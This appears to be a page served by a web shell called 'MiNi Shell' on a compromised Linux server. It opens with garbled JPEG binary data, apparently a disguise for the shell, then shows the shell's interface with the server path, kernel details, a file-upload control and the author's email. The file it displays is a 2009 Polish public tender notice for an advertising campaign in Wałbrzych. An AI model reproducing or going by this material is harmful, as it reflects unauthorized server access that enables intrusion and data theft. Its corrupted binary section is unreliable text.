JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090512/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090512/145122-N-2009.html

<p class="kh_header"><b>Wałbrzych: Usługa polegająca na przygotowaniu i przeprowadzeniu kampanii reklamowej promującej projekt Inwestycje w innowacyjne przedsięwzięcia z sektora MSP</b><br>
<b>Numer ogłoszenia: 145122 - 2009; data zamieszczenia: 12.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Dolnośląska Agencja Rozwoju Regionalnego S.A. , ul. Wysockiego 10, 58-300 Wałbrzych, woj. dolnośląskie, tel. 074 842 69 04, faks 074 888 09 16.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa polegająca na przygotowaniu i przeprowadzeniu kampanii reklamowej promującej projekt Inwestycje w innowacyjne przedsięwzięcia z sektora MSP.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamawiający zamierza promować projekt w czasopismach branżowych i/ lub w opracowaniach branżowych i na portalach internetowych zajmujących się tematyka innowacji i inwestycji kapitałowych. Grupą docelową promocji są zarówno właściciele innowacyjnych firm, którzy będą zachęcani do udziału w projekcie jak i inwestorzy prywatni i instytucjonalni zajmujący się inwestowaniem w przedsięwzięcia komercyjne. Projekt ma charakter ogólnopolski w związku z czym media wykorzystywane do jego promocji również powinny mieć taki zasięg. Zamawiający nie zamierza korzystać z innych kanałów promocji niż prasa i opracowania branżowe, Internet ewentualnie mailing skierowany bezpośrednio do beneficjentów projektu tj. funduszy venture lub i seed capital, aniołów biznesu itp. oraz innowacyjnych firm z sektora MŚP.  
Przedmiot zamówienia zostanie doprecyzowany i uzupełniony na etapie prowadzenia negocjacji/ dialogu z Wykonawcami. Zamawiający oczekuje, że w trakcie negocjacji Wykonawcy - w oparciu o swoją wiedzę i doświadczenie - zaproponują najbardziej optymalne rozwiązania służące realizacji przedmiotu zamówienia w sposób najbardziej efektywny..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 79.41.50.00-3, 79.41.61.00-4, 79.41.62.00-5, 79.34.00.00-9, 79.34.10.00-6, 79.34.11.00-7, 79.34.12.00-8, 79.34.14.00-0, 79.34.20.00-3, 79.34.22.00-5.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2009.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Ustala się kwotę wadium dla zamówienia w wysokości - 2 000 zł (słownie: dwa tysiące złotych 00/100);Zamawiający, po przeprowadzeniu negocjacji z Wykonawcami wskaże - w SIWZ dołączonym do ZAPROSZENIA DO SKŁADANIA OFERT - konkretną datę, oznaczoną co do dnia i godziny, do której Wykonawca będzie zobowiązany wnieść wadium.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki  określone w art. 22 ust.1 ustawy:
1) Posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień.
2) Posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia, tj.:
a) wykonali co najmniej 1 kampanię marketingową dla małej lub średniej firmy w okresie ostatnich 3 lat tj. od dnia 12 maja 2006 r. do dnia 11 maja 2009r., a jeśli okres działalności jest krótszy - w tym okresie.
b) dysponują co najmniej 2 osobami, które będą uczestniczyć w wykonaniu zamówienia, posiadającymi kwalifikacje zawodowe, doświadczenie i wykształcenie niezbędne do wykonania zamówienia w zakresie następujących dziedzin: pozyskiwania inwestorów lub marketingu, public relations, komunikacji reklamowej, zarządzania mediami lub reklamy, a także przedstawią zakresy czynności tych osób. Tym samym wyznaczą do realizacji przedmiotu zamówienia:
- Kierownika zespołu posiadającego minimum 3 lata doświadczenia w zakresie rynku kapitałowego i public relations, reklamy, promocji lub marketingu, minimum 2 lata doświadczenia w przygotowaniu i prowadzeniu kampanii informacyjno- promocyjnych, oraz mediów, a także posiadającego doświadczenie w produkcji lub nadzorze nad produkcją co najmniej dwóch różnych kampanii reklamowych,
- Członka zespołu posiadającego minimum rok doświadczenia w branży usług reklamowych, który brał udział w przygotowaniu kreacji co najmniej jednej kampanii informacyjno- promocyjnej dotyczącej pozyskiwania kapitału zewnętrznego dla firm.
Powyższych funkcji nie można łączyć.
c) posiadają udokumentowane doświadczenie w kontaktach z uczestnikami rynku kapitałowego, mediami, organizacjami i stowarzyszeniami biznesowym;
d)  tworzyli lub współtworzyli co najmniej 2 publikacje drukowane o nakładzie co najmniej 500 sztuk, których tematyka dotyczyła pozyskania finansowania przez MŚP w okresie ostatnich 3 lat tj. od dnia 12 maja 2006 r. do dnia 11 maja 2009r., a jeśli okres działalności jest krótszy - w tym okresie.
3) Nie podlegają wykluczeniu z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 ust. 1 i ust. 2 ustawy. 
4) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia.
Ocena spełniania warunków udziału w postępowaniu przeprowadzona będzie w oparciu o złożone przez Wykonawców oświadczenia i dokumenty zgodnie z metodą zero- jedynkową. Za spełnienie warunku Zamawiający przyzna 1 pkt, za nie spełnienie warunku 0 pkt, co będzie równoznaczne z wykluczeniem Wykonawcy.

2. Zamawiający za spełnianie warunku określonego w rozdz. VI ust. 1 pkt 2a ogłoszenia przyzna 2 pkt, a za każdą kolejną kampanię informacyjno - promocyjną, która dotyczyła pozyskania inwestora zewnętrznego dla firmy 2 pkt. Zamawiający maksymalnie przyzna za spełnianie tego warunku 6 pkt.  Zamawiający za spełnianie warunku określonego w rozdz. VI ust. 1 pkt 2b ogłoszenia przyzna 1 pkt, a za każdą kolejną osobę (o kwalifikacjach równoważnych jak członek zespołu, która będzie uczestniczyć w wykonaniu zamówienia otrzyma 1 pkt. Zamawiający maksymalnie przyzna za spełnianie tego warunku 4 pkt. Zamawiający za spełnianie warunku określonego w rozdz. VI ust. 1 pkt 2c ogłoszenia przyzna Wykonawcy 1 pkt, a za każdy kolejny dokument potwierdzający doświadczenie w kontaktach przyzna 1 pkt. Zamawiający maksymalnie przyzna za spełnianie tego warunku 3 pkt. Zamawiający za spełnianie warunku określonego w rozdz. VI ust. 1 pkt 2d ogłoszenia przyzna Wykonawcy 2 pkt, a za każdą kolejną  publikacje drukowaną o nakładzie co najmniej 500 sztuk, których tematyka dotyczyła pozyskania finansowania przez MŚP przyzna 1 pkt. Zamawiający maksymalnie przyzna za spełnianie tego warunku 4 pkt. W przypadku otrzymania równej liczby punktów przez Wykonawców zdecyduje liczba przeprowadzonych kampanii promocyjnych których tematem było pozyskanie inwestora lub finansowania dla przedsiębiorcy dla firm z sektora MŚP..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia, że Wykonawca spełnia warunki ubiegania się o zamówienie wymienione w rozdz. VI Ogłoszenia, Wykonawca wraz z wnioskiem o dopuszczenie do postępowania składa następujące dokumenty i oświadczenia:
1) Oświadczenie w trybie art. 44 w związku z art. 22 ust. 1 ustawy i art. 24 ust 1 i ust. 2 ustawy [w formie oryginału], wzór takiego oświadczenia stanowi załącznik nr 1 do Ogłoszenia (stanowi wzór oświadczenia składanego przez Wykonawcę składającego samodzielnie Wniosek o dopuszczenie do udziału w postępowaniu lub pełnomocnika Wykonawców składających wspólnie Wniosek);
2) Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu (aktualny należy rozumieć jako odpis aktualny, a nie pełny) [w formie oryginałów albo kopii poświadczonych za zgodność z oryginałem przez Wykonawcę];
3) Wykaz wykonanych kampanii marketingowych dla małych i średnich przedsiębiorstw każda w okresie ostatnich 3 lat tj. od dnia 12 maja 2006 r. do dnia 11 maja 2009 r., a jeśli okres działalności jest krótszy - w tym okresie -  [w formie oryginału], wraz z dokumentami potwierdzającymi, że usługi te zostały wykonane należycie [w formie oryginału albo kopii poświadczonych za zgodność z oryginałem przez Wykonawcę]  wzór takiego wykazu stanowi załącznik nr 2 do Ogłoszenia
4) Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca i które będą uczestniczyć w wykonaniu zamówienia wraz z informacją na temat kwalifikacji zawodowych, doświadczenia i wykształcenia, a także zakresy czynności tych osób - [w formie oryginału]; jeżeli w wykazie Wykonawca wskazał osoby, którymi będzie dysponował, załączy do wniosku pisemne zobowiązanie innego podmiotu do udostępnienia osób zdolnych do wykonania zamówienia,  wzór takiego wykazu stanowi załącznik nr 2 do Ogłoszenia
5) Dokumenty potwierdzające posiadanie doświadczenia w kontaktach z uczestnikami rynku kapitałowego, mediami, organizacjami i stowarzyszeniami biznesowym [w formie oryginału lub kopii listów referencyjnych, zaświadczeń itp.],
6) Kopie lub oryginały publikacji, o których mowa w rozdz. VI ust. 1 pkt 2d  wraz z informacją o terminie wydania i nakładzie 
7) Pełnomocnictwo do reprezentowania Wykonawcy w formie oryginału albo kopii poświadczonej przez notariusza za zgodność z oryginałem (jeżeli wniosek i załączniki nie będą podpisane przez osobę wskazaną w rejestrze sądowym lub innym dokumencie właściwym dla formy organizacyjnej Wykonawcy), z podaniem Zamawiającego, jakiego zamówienia publicznego dotyczy oraz jego przedmiotu. Z pełnomocnictwa musi jednoznacznie wynikać do jakich czynności prawnych dana osoba zastała umocowana..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> dialog konkurencyjny.</p>
<p><b>IV.1.2) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu:</b> 3.</p><br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1"><br>
<li>1 - Cena - 30</li>
<li>2 - Wartość merytoryczna oferty (mediaplan, koncepcja działań promocyjnych - spójność, oryginalność, zgodność z potrzebami zamawiającego). - 70</li>
</ul><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> nie dotyczy.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację Istotnych Warunków Zamówienia otrzymają Wykonawcy zaproszeni do składania ofert..</p>
<p><b>IV.3.2) Opis potrzeb i wymagań zamawiającego określonych w sposób umożliwiający przygotowanie się wykonawców do udziału w dialogu konkurencyjnym lub informacja o sposobie uzyskania tego opisu:</b> Zadania niezbędne do wykonania przedmiotu zamówienia: 1) stworzenie spójnej koncepcji promocji obejmującej ogłoszenia prasowe, internetowe i ewentualnie mailng 2) przygotowanie identyfikacji wizualnej wykorzystywanej w trakcie promocji - wzory ogłoszeń prasowych, banerów internetowych, tekstów sponsorowanych - 3) opracowanie zintegrowanej z główną linią promocyjną koncepcji promocji dla poszczególnych grup docelowych tj. właścicieli innowacyjnych firm i przedstawicieli rynku kapitałowego 4) propozycja działań z zakresu experiential marketing (marketing szeptany, guerilla marketing itp.), 5) inne formy promocji zaproponowane przez Wykonawcę na etapie negocjacji..</p><p><b>IV.3.3) Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:</b> Zamawiający nie przewiduje nagród dla Wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert..</p><p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.05.2009 godzina 10:00, miejsce: Dolnośląska Agencja Rozwoju Regionalnego S.A. ul. Szczawieńska 2, 58-310 Szczawno- Zdrój..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com